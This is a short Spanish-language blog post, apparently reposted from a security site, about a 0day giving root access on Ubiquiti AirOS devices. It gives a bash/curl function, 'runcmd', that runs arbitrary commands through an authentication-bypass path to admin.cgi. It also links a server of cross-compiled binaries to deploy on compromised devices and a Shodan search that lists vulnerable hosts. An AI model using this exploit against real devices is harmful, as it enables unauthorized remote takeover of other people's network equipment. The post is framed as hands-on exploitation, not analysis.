http://arealinux.blogspot.com.es/2011/12/0day-en-airos-acceso-como-root.html
fuente: http://www.hackplayers.com/2012/10/explotacion-postexplotacion-0day-en-AirOS.html#more....Tenemos un pequeño directorio con un puñado de binarios ya crosscompilados y listos para AirOS disponible en:http://5.175.223.63/bin/Y empaquetado en .tar:http://5.175.223.63/bin.tarIncluso podríamos incluir algunos más como ngircd (Un pequeño servidor IRC), o lo que se nos ocurra.A continuación, vamos a pasar a automatizar estas tareas. Obviamente no puedo publicar más que un par de lineas para deja la imaginación flotar con bash y curl:runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!' -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }....
vuln: http://www.shodanhq.com/search?q=airos
1º noticia: http://seclists.org/fulldisclosure/2011/Dec/419
No hay comentarios:
Publicar un comentario